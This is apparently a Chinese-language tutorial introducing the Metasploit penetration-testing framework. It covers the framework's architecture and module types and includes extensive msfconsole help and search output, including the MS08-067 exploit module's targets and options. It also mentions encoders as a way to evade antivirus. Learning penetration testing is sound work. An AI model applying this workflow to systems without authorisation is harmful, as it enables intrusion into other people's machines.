Metasploit Framework

news2024/11/18 19:59:46

简介

目前最流行、最强大、最具扩展性的渗透测试平台软件基于Metasploit进行渗透测试和漏洞分析的流程和方法

2003年由HDMore发布第一版,2007年用 ruby 语言重写

  • 框架集成了渗透测试标准(PETS)思想
  • 一定程度上统一了渗透测试和漏洞研究的工作环境
  • 新的攻击代码可以比较容易的加入框架

开发活跃版本更新频繁(每周)

  • 早期版本基于社区力量维护,被 Rapid 7收购后打造出其商业版产品
  • 目前分化为四个版本,社区版本依然十分活跃
  • HD More说:为Metasploit写书是种自虐!
  • 2014年之后市场上没有再出现新的Metasploit教材

被HDMore称之为当时最好的Metasploit教材(2011/2012)
【Metasploit 渗透测试指南】

MSF架构

MSF架构

  • Rex

    • 基本功能库,用下完成日常基本任务,无需人工手动编码实现处理 - socket 连接访问、协议应答(http/SSL/SMB等)
    • 编码转换(XOR、Base64、Unicode )
  • Msf.:Core

    • 提供Msf的核心基本API,是框架的核心能力实现库
  • Msf::Base

    • 提供友好的API接口,便于模块调用的库
  • Plugin 插件

    • 连接和调用外部扩展功能和系统

MSF 默认集成于Kali Linux 之中

使用postgresql数据库存储数据早期版本需要先启动数据库再启动msf

启动命令:msfconsole

/usr/share/metasploit-framework/modules

技术功能模块(不是流程模块 )

  • Exploits:利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动)

  • Payload:成功exploit之后,真正在目标系统执行的代码或指令。

    • Shellcode 或系统命令

    • 三种 Payload : /usr/share/metasploit-framework/modules/payloads/

    • Single : all-in-one

    • Stager:目标计算机内存有限时,先传输一个较小的payload用于建立连接

    • Stages:利用stager建立的连接下载的后续payload

    • Stager、Stages都有多种类型,适用于不同场受

    • Shellcode是payload的一种,由于其建立正向/反向 shell 而得名

┌──(kali㉿kali)-[~]
└─$ cd /usr/share/metasploit-framework/  
                                                               
┌──(kali㉿kali)-[/usr/share/metasploit-framework]
└─$ ls
app                           modules          plugins
config                        msfconsole       Rakefile
data                          msfd             ruby
db                            msfdb            script-exploit
docs                          msf-json-rpc.ru  script-password
documentation                 msfrpc           script-recon
Gemfile                       msfrpcd          scripts
Gemfile.lock                  msfupdate        tools
lib                           msfvenom         vendor
metasploit-framework.gemspec  msf-ws.ru


┌──(kali㉿kali)-[/usr/share/metasploit-framework]
└─$ cd modules 
                                                               
┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules]
└─$ ls
auxiliary  encoders  evasion  exploits  nops  payloads  post

┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules]
└─$ cd exploits
                                                               
┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules/exploits]
└─$ ls
aix        example_linux_priv_esc.rb  hpux       openbsd
android    example.py                 irix       osx
apple_ios  example.rb                 linux      qnx
bsd        example_webapp.rb          mainframe  solaris
bsdi       firefox                    multi      unix
dialup     freebsd                    netware    windows

┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules]
└─$ ls
auxiliary  encoders  evasion  exploits  nops  payloads  post
                                                               
┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules]
└─$ cd payloads
                                                               
┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules/payloads]
└─$ ls
adapters  singles  stagers  stages
                                                               
┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules/payloads]
└─$ cd singles 
                                                               
┌──(kali㉿kali)-[/usr/…/metasploit-framework/modules/payloads/singles]
└─$ ls
aix        bsd   firefox  linux      osx     r        tty
android    bsdi  generic  mainframe  php     ruby     windows
apple_ios  cmd   java     nodejs     python  solaris
                                                               
┌──(kali㉿kali)-[/usr/…/metasploit-framework/modules/payloads/singles]
└─$ cd php     
                                                               
┌──(kali㉿kali)-[/usr/…/modules/payloads/singles/php]
└─$ ls
bind_perl_ipv6.rb  exec.rb
bind_perl.rb       meterpreter_reverse_tcp.rb
bind_php_ipv6.rb   reverse_perl.rb
bind_php.rb        reverse_php.rb
download_exec.rb   shell_findsock.rb

技术功能模块(不是流程模块

  • Auxiliary:执行信息收集、枚举、指纹探测、扫描等功能的辅助模块(没有payload的exploit 模块)

  • Encoders:对payload进行加密,躲避AV检查的模块

  • Nops:提高 payload 稳定性及维持大小

┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules]
└─$ ls
auxiliary  encoders  evasion  exploits  nops  payloads  post
                                                               
┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules]
└─$ cd auxiliary
                                                               
┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules/auxiliary]
└─$ ls
admin    cloud    example.py  gather   server   voip
analyze  crawler  example.rb  parser   sniffer  vsploit
bnat     docx     fileformat  pdf      spoof
client   dos      fuzzers     scanner  sqli

MSF 基本使用和控制台命令

基本使用

  • 使用前先升级:msfupdate

  • Msfcli 使用接口

  • Msfconsole 使用接口

    • 最流行的用户接口

    • 几乎可以使用全部MSF功能

    • 控制台命令支持 TAB 自动补齐支持外部命令的执行(系统命令等 )

    • 点击鼠标启动 /msfconsole -h -g -r -v / exit

    • help / ? / help vulns

──(root㉿kali)-[~]
└─# msfconsole
                                                  

                 _---------.                                   
             .' #######   ;."                                  
  .---,.    ;@             @@`;   .---,..                      
." @@@@@'.,'@@            @@@@@',.'@@@@ ".                     
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;                     
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'                     
     "--'.@@@  -.@        @ ,'-   .'--"                        
          ".@' ; @       @ `.  ;'                              
            |@@@@ @@@     @    .                               
             ' @@@ @@   @@    ,                                
              `.@@@@    @@   .                                 
                ',@@     @   ;           _____________         
                 (   3 C    )     /|___ / Metasploit! \        
                 ;@'. __*__,."    \|--- \_____________/        
                  '(.,...."/                                   


       =[ metasploit v6.2.26-dev                          ]
+ -- --=[ 2264 exploits - 1189 auxiliary - 404 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: To save all commands executed since start up 
to a file, use the makerc command
Metasploit Documentation: https://docs.metasploit.com/

msf6 > help 
                                                                                                    
Core Commands                                                                                       
=============                                                                                       
                                                                                                    
    Command       Description                                                                       
    -------       -----------                                                                       
    ?             Help menu                                                                         
    banner        Display an awesome metasploit banner                                              
    cd            Change the current working directory                                              
    color         Toggle color                                                                      
    connect       Communicate with a host                                                           
    debug         Display information useful for debugging                                          
    exit          Exit the console                                                                  
    features      Display the list of not yet released features that can be opted in to             
    get           Gets the value of a context-specific variable                                     
    getg          Gets the value of a global variable                                               
    grep          Grep the output of another command                                                
    help          Help menu                                                                         
    history       Show command history                                                              
    load          Load a framework plugin                                                                         
    quit          Exit the console                                                                                
    repeat        Repeat a list of commands                                                                       
    route         Route traffic through a session                                                                 
    save          Saves the active datastores                                                                     
    sessions      Dump session listings and display information about sessions                                    
    set           Sets a context-specific variable to a value                                                     
    setg          Sets a global variable to a value                                                               
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    tips          Show a list of useful productivity tips
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers


Module Commands
===============

    Command       Description
    -------       -----------
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    clearm        Clear the module stack
    favorite      Add module(s) to the list of favorite modules
    info          Displays information about one or more modules
    listm         List the module stack
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Interact with a module by name or search term/index


Job Commands
============

    Command       Description
    -------       -----------
    handler       Start a payload handler as job
    jobs          Displays and manages jobs
    kill          Kill a job
    rename_job    Rename a job


Resource Script Commands
========================

    Command       Description
    -------       -----------
    makerc        Save commands entered since start to a file
    resource      Run the commands stored in a file


Database Backend Commands
=========================

    Command           Description
    -------           -----------
    analyze           Analyze database information about a specific address or address range
    db_connect        Connect to an existing data service
    db_disconnect     Disconnect from the current data service
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
    db_remove         Remove the saved data service entry
    db_save           Save the current data service connection as the default to reconnect on startup
    db_status         Show the current data service status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces


Credentials Backend Commands
============================

    Command       Description
    -------       -----------
    creds         List all credentials in the database


Developer Commands
==================

    Command       Description
    -------       -----------
    edit          Edit the current module or a file with the preferred editor
    irb           Open an interactive Ruby shell in the current context
    log           Display framework.log paged to the end if possible
    pry           Open the Pry debugger on the current module or Framework
    reload_lib    Reload Ruby library files from specified paths
    time          Time how long it takes to run a particular command


msfconsole
==========

`msfconsole` is the primary interface to Metasploit Framework. There is quite a
lot that needs go here, please be patient and keep an eye on this space!

Building ranges and lists
-------------------------

Many commands and options that take a list of things can use ranges to avoid
having to manually list each desired thing. All ranges are inclusive.

### Ranges of IDs

Commands that take a list of IDs can use ranges to help. Individual IDs must be
separated by a `,` (no space allowed) and ranges can be expressed with either
`-` or `..`.

### Ranges of IPs

There are several ways to specify ranges of IP addresses that can be mixed
together. The first way is a list of IPs separated by just a ` ` (ASCII space),
with an optional `,`. The next way is two complete IP addresses in the form of
`BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR
specifications may also be used, however the whole address must be given to
Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC.
Additionally, a netmask can be used in conjunction with a domain name to
dynamically resolve which block to target. All these methods work for both IPv4
and IPv6 addresses. IPv4 addresses can also be specified with special octet
ranges from the [NMAP target
specification](https://nmap.org/book/man-target-specification.html)

### Examples

Terminate the first sessions:

    sessions -k 1

Stop some extra running jobs:

    jobs -k 2-6,7,8,11..15

Check a set of IP addresses:

    check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255

Target a set of IPv6 hosts:

    set RHOSTS fe80::3990:0000/110, ::1-::f0f0

Target a block from a resolved domain name:

    set RHOSTS www.example.test/24
msf6 > 

MSF控制台命令

  • Banner、Color、connect -h

  • show auxiliary / exploits / payloads / encoders / nops

  • search usermap script / help search

    • search name:mysal/ path:scada / platform:aix / type:aux/author:aaron/cve:2011 / 可多条件同时搜索
  • use dos/windows/smb/ms09 001 write

    • show options / payloads / targets / advanced / evasion
    • info edit
  • Check 、back

msf6 > banner

     .~+P``````-o+:.                                      -o+:.
.+oooyysyyssyyssyddh++os-`````                  ```````````````    `
+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o
++++///~~~~///++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
--.`                 .-.-...-+++++++++++++++~~//++++++++++++///
                                `...............`              `...-/...`


                                  .::::::::::-.                     .::::::-
                                .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo
                                 :Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
                                 .sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
                                  -Nd`  :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
                                   -Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
    `oo/``-hd:  ``                 .sNd  :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
      .yNmMMh//+syysso-`````` -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
    .shMMMMN//dmNMMMMMMMMMMMMs`     `:```-o++++oooo+:/ooooo+:+o+++oooo++/
    `///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os:
          /MMMMMMMMMMMMMMMMMMd.     `/++-.-yy/...osydh/-+oo:-`o//...oyodh+
          -hMMmssddd+:dMMmNMMh.     `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
          .sMMmo.    -dMd--:mN/`           ||--X--||          ||--X--||
........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//.........
================================================================================
=====================+--------------------------------+=========================
=====================| Session one died of dysentery. |=========================
=====================+--------------------------------+=========================
================================================================================

                     Press ENTER to size up the situation

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

                        Press SPACE BAR to continue



       =[ metasploit v6.2.26-dev                          ]
+ -- --=[ 2264 exploits - 1189 auxiliary - 404 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: After running db_nmap, be sure to 
check out the result of hosts and services
Metasploit Documentation: https://docs.metasploit.com/

msf6 > banner
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                     
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                     
%%  %  %%%%%%%%   %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%                                     
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                     
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                     
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                     
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                     
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%                                     
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%                                     
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%                                     
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%                                     
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %                                     
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%                                     
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%                                     
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                     
                                                                                                                  

       =[ metasploit v6.2.26-dev                          ]
+ -- --=[ 2264 exploits - 1189 auxiliary - 404 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Tired of setting RHOSTS for modules? Try 
globally setting it with setg RHOSTS x.x.x.x
Metasploit Documentation: https://docs.metasploit.com/

msf6 > 

msf6 > color
Usage: color <'true'|'false'|'auto'>

Enable or disable color output.

msf6 > color true

connect
msf6 > connect -h
Usage: connect [options] <host> <port>

Communicate with a host, similar to interacting via netcat, taking advantage of
any configured session pivoting.

OPTIONS:

    -c, --comm <comm>               Specify which Comm to use.
    -C, --crlf                      Try to use CRLF for EOL sequence.
    -h, --help                      Help banner.
    -i, --send-contents <file>      Send the contents of a file.
    -p, --proxies <proxies>         List of proxies to use.
    -P, --source-port <port>        Specify source port.
    -S, --source-address <address>  Specify source address.
    -s, --ssl                       Connect with SSL.
    -u, --udp                       Switch to a UDP socket.
    -w, --timeout <seconds>         Specify connect timeout.
    -z, --try-connection            Just try to connect, then return.
msf6 > 

show
msf6 > show
[-] Argument required

[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options, favorites
[*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions


msf6 > show exploits 

Exploits
========

  #     Name                                                                               Disclosure Date  Rank       Check  Description
  -     ----                                                                               ---------------  ----       -----  -----------
  0     exploit/aix/local/ibstat_path                                                      2013-09-24       excellent  Yes    ibstat $PATH Privilege Escalation                                                                    
  1     exploit/aix/local/xorg_x11_server                                                  2018-10-25       great      Yes    Xorg X11 Server Local Privilege Escalation
  2     exploit/aix/rpc_cmsd_opcode21                                                      2009-10-07       great      No     AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
  3     exploit/aix/rpc_ttdbserverd_realpath                                               2009-06-17       great      No     ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
  4     exploit/android/adb/adb_server_exec                                                2016-01-01       excellent  Yes    Android ADB Debug Server Remote Payload Execution 


msf6 > show -h
[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options, favorites
[*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions
msf6 > show payloads 

Payloads
========

  #    Name                                                                       Disclosure Date  Rank    Check  Description
  -    ----                                                                       ---------------  ----    -----  -----------
  0    payload/aix/ppc/shell_bind_tcp                                                              normal  No     AIX Command Shell, Bind TCP Inline
  1    payload/aix/ppc/shell_find_port                                                             normal  No     AIX Command Shell, Find Port Inline
  2    payload/aix/ppc/shell_interact                                                              normal  No     AIX execve Shell for inetd
  3    payload/aix/ppc/shell_reverse_tcp                                                           normal  No     AIX Command Shell, Reverse TCP Inline
  4    payload/android/meterpreter/reverse_http                                                    normal  No     Android Meterpreter, Android Reverse HTTP Stager
  5    payload/android/meterpreter/reverse_https                                                   normal  No     Android Meterpreter, Android Reverse HTTPS Stager
  6    payload/android/meterpreter/reverse_tcp                                                     normal  No     Android Meterpreter, Android Reverse TCP Stager
  7    payload/android/meterpreter_reverse_http                                                    normal  No     Android Meterpreter Shell, Reverse HTTP Inline
  8    payload/android/meterpreter_reverse_https                                                   normal  No     Android Meterpreter Shell, Reverse HTTPS Inline
  9    payload/android/meterpreter_reverse_tcp                                                     normal  No     Android Meterpreter Shell, Reverse TCP Inline
  
search
msf6 > search ms10-046

Matching Modules
================

   #  Name                                                         Disclosure Date  Rank       Check  Description
   -  ----                                                         ---------------  ----       -----  -----------
   0  exploit/windows/browser/ms10_046_shortcut_icon_dllloader     2010-07-16       excellent  No     Microsoft Windows Shell LNK Code Execution
   1  exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader  2015-03-10       excellent  No     Microsoft Windows Shell LNK Code Execution
   2  exploit/windows/smb/ms10_046_shortcut_icon_dllloader         2010-07-16       excellent  No     Microsoft Windows Shell LNK Code Execution
   3  exploit/windows/smb/ms15_020_shortcut_icon_dllloader         2015-03-10       excellent  No     Microsoft Windows Shell LNK Code Execution


Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/smb/ms15_020_shortcut_icon_dllloader  


msf6 > search -h
Usage: search [<options>] [<keywords>:<value>]

Prepending a value with '-' will exclude any matching results.
If no options or keywords are provided, cached results are displayed.


OPTIONS:

    -h, --help                      Help banner
    -I, --ignore                    Ignore the command if the only match has the same name as the search
    -o, --output <filename>         Send output to a file in csv format
    -r, --sort-descending <column>  Reverse the order of search results to descending order
    -S, --filter <filter>           Regex pattern used to filter search results
    -s, --sort-ascending <column>   Sort search results by the specified column in ascending order
    -u, --use                       Use module if there is one result

Keywords:
  aka              :  Modules with a matching AKA (also-known-as) name
  author           :  Modules written by this author
  arch             :  Modules affecting this architecture
  bid              :  Modules with a matching Bugtraq ID
  cve              :  Modules with a matching CVE ID
  edb              :  Modules with a matching Exploit-DB ID
  check            :  Modules that support the 'check' method
  date             :  Modules with a matching disclosure date
  description      :  Modules with a matching description
  fullname         :  Modules with a matching full name
  mod_time         :  Modules with a matching modification date
  name             :  Modules with a matching descriptive name
  path             :  Modules with a matching path
  platform         :  Modules affecting this platform
  port             :  Modules with a matching port
  rank             :  Modules with a matching rank (Can be descriptive (ex: 'good') or numeric with comparison operators (ex: 'gte400'))
  ref              :  Modules with a matching ref
  reference        :  Modules with a matching reference
  target           :  Modules affecting this target
  type             :  Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)

Supported search columns:
  rank             :  Sort modules by their exploitabilty rank
  date             :  Sort modules by their disclosure date. Alias for disclosure_date
  disclosure_date  :  Sort modules by their disclosure date
  name             :  Sort modules by their name
  type             :  Sort modules by their type
  check            :  Sort modules by whether or not they have a check method

Examples:
  search cve:2009 type:exploit
  search cve:2009 type:exploit platform:-linux
  search cve:2009 -s name
  search type:exploit -s type -r
                                                                                                    

use
msf6 > use exploit/windows/smb/ms08_067_netapi 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > info

       Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2008-10-28

Provided by:
  hdm <x@hdm.io>
  Brett Moore <brett.moore@insomniasec.com>
  frank2 <frank2@dc949.org>
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  2   Windows XP SP0/SP1 Universal
  3   Windows 2003 SP0 Universal
  4   Windows XP SP2 English (AlwaysOn NX)
  5   Windows XP SP2 English (NX)
  6   Windows XP SP3 English (AlwaysOn NX)
  7   Windows XP SP3 English (NX)
  8   Windows XP SP2 Arabic (NX)
  9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
  10  Windows XP SP2 Chinese - Simplified (NX)
  11  Windows XP SP2 Chinese - Traditional (NX)
  12  Windows XP SP2 Czech (NX)
  13  Windows XP SP2 Danish (NX)
  14  Windows XP SP2 German (NX)
  15  Windows XP SP2 Greek (NX)
  16  Windows XP SP2 Spanish (NX)
  17  Windows XP SP2 Finnish (NX)
  18  Windows XP SP2 French (NX)
  19  Windows XP SP2 Hebrew (NX)
  20  Windows XP SP2 Hungarian (NX)
  21  Windows XP SP2 Italian (NX)
  22  Windows XP SP2 Japanese (NX)
  23  Windows XP SP2 Korean (NX)
  24  Windows XP SP2 Dutch (NX)
  25  Windows XP SP2 Norwegian (NX)
  26  Windows XP SP2 Polish (NX)
  27  Windows XP SP2 Portuguese - Brazilian (NX)
  28  Windows XP SP2 Portuguese (NX)
  29  Windows XP SP2 Russian (NX)
  30  Windows XP SP2 Swedish (NX)
  31  Windows XP SP2 Turkish (NX)
  32  Windows XP SP3 Arabic (NX)
  33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
  34  Windows XP SP3 Chinese - Simplified (NX)
  35  Windows XP SP3 Chinese - Traditional (NX)
  36  Windows XP SP3 Czech (NX)
  37  Windows XP SP3 Danish (NX)
  38  Windows XP SP3 German (NX)
  39  Windows XP SP3 Greek (NX)
  40  Windows XP SP3 Spanish (NX)
  41  Windows XP SP3 Finnish (NX)
  42  Windows XP SP3 French (NX)
  43  Windows XP SP3 Hebrew (NX)
  44  Windows XP SP3 Hungarian (NX)
  45  Windows XP SP3 Italian (NX)
  46  Windows XP SP3 Japanese (NX)
  47  Windows XP SP3 Korean (NX)
  48  Windows XP SP3 Dutch (NX)
  49  Windows XP SP3 Norwegian (NX)
  50  Windows XP SP3 Polish (NX)
  51  Windows XP SP3 Portuguese - Brazilian (NX)
  52  Windows XP SP3 Portuguese (NX)
  53  Windows XP SP3 Russian (NX)
  54  Windows XP SP3 Swedish (NX)
  55  Windows XP SP3 Turkish (NX)
  56  Windows 2003 SP1 English (NO NX)
  57  Windows 2003 SP1 English (NX)
  58  Windows 2003 SP1 Japanese (NO NX)
  59  Windows 2003 SP1 Spanish (NO NX)
  60  Windows 2003 SP1 Spanish (NX)
  61  Windows 2003 SP1 French (NO NX)
  62  Windows 2003 SP1 French (NX)
  63  Windows 2003 SP2 English (NO NX)
  64  Windows 2003 SP2 English (NX)
  65  Windows 2003 SP2 German (NO NX)
  66  Windows 2003 SP2 German (NX)
  67  Windows 2003 SP2 Portuguese (NX)
  68  Windows 2003 SP2 Portuguese - Brazilian (NX)
  69  Windows 2003 SP2 Spanish (NO NX)
  70  Windows 2003 SP2 Spanish (NX)
  71  Windows 2003 SP2 Japanese (NO NX)
  72  Windows 2003 SP2 French (NO NX)
  73  Windows 2003 SP2 French (NX)
  74  Windows 2003 SP2 Chinese - Simplified (NX)
  75  Windows 2003 SP2 Czech (NX)
  76  Windows 2003 SP2 Dutch (NX)
  77  Windows 2003 SP2 Hungarian (NX)
  78  Windows 2003 SP2 Italian (NX)
  79  Windows 2003 SP2 Russian (NX)
  80  Windows 2003 SP2 Swedish (NX)
  81  Windows 2003 SP2 Turkish (NX)

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wik
                                      i/Using-Metasploit
  RPORT    445              yes       The SMB service port (TCP)
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 408
  Avoid: 8 characters

Description:
  This module exploits a parsing flaw in the path canonicalization 
  code of NetAPI32.dll through the Server Service. This module is 
  capable of bypassing NX on some operating systems and service packs. 
  The correct target must be used to prevent the Server Service (along 
  with a dozen others in the same process) from crashing. Windows XP 
  targets seem to handle multiple successful exploitation events, but 
  2003 targets will often crash or hang on subsequent attempts. This 
  is just the first version of this module, full support for NX bypass 
  on 2003, along with other platforms, is still in development.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2008-4250
  OSVDB (49243)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos


View the full module info with the info -d command.

  • db status / db rebuild cache

  • db nmap

    • Hosts / host 1.1.11 / hosts -u / hosts -c address,os flavor -S Linux

    • services -p 80 / services -c info,name -p 1-1000l

    • vulns / creds ( mysql login ) / loot ( hashdump )

  • db disconnect / db

    • connect- /usr/share/metasploit-framework/config/database.yml
  • db import / dbexport

    • db import /root/nmap.xml
    • db export -fxml /root/bak.xml
Database Backend Commands
=========================

    Command           Description
    -------           -----------
    analyze           Analyze database information about a specific address or address range
    db_connect        Connect to an existing data service
    db_disconnect     Disconnect from the current data service
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
    db_remove         Remove the saved data service entry
    db_save           Save the current data service connection as the default to reconnect on start
                      up
    db_status         Show the current data service status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces

msf6 > db_status
[*] postgresql selected, no connection
msf6 > exit
              

┌──(kali㉿kali)-[~]
└─$ msfdb start
[-] Error: /usr/bin/msfdb must be run as root
                                                                                                     
┌──(kali㉿kali)-[~]
└─$ sudo su -                             
[sudo] password for kali: 
┌──(root㉿kali)-[~]
└─# msfdb start
[+] Starting database

netstat -pantu l grep 5432

如果 msfdb start 无效,可先通过netstat -pantu | grep 5432 查看是否启动服务端口,如果还是不行就通过service postgresql start

msfdb start

msf6 > hosts -h
Usage: hosts [ options ] [addr1 addr2 ...]


OPTIONS:

    -a, --add <host>                       Add the hosts instead of searching
    -c, --columns <columns>                Only show the given columns (see list below)
    -C, --columns-until-restart <columns>  Only show the given columns until the next restart (see list below)
    -d, --delete <hosts>                   Delete the hosts instead of searching
    -h, --help                             Show this help information
    -i, --info <info>                      Change the info of a host
    -m, --comment <comment>                Change the comment of a host
    -n, --name <name>                      Change the name of a host
    -O, --order <column id>                Order rows by specified column number
    -o, --output <filename>                Send output to a file in csv format
    -R, --rhosts                           Set RHOSTS from the results of the search
    -S, --search <filter>                  Search string to filter by
    -T, --delete-tag <tag>                 Remove a tag from a range of hosts
    -t, --tag <tag>                        Add or specify a tag to a range of hosts
    -u, --up                               Only show hosts which are up

Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags


msf6 > service -h
[*] exec: service -h

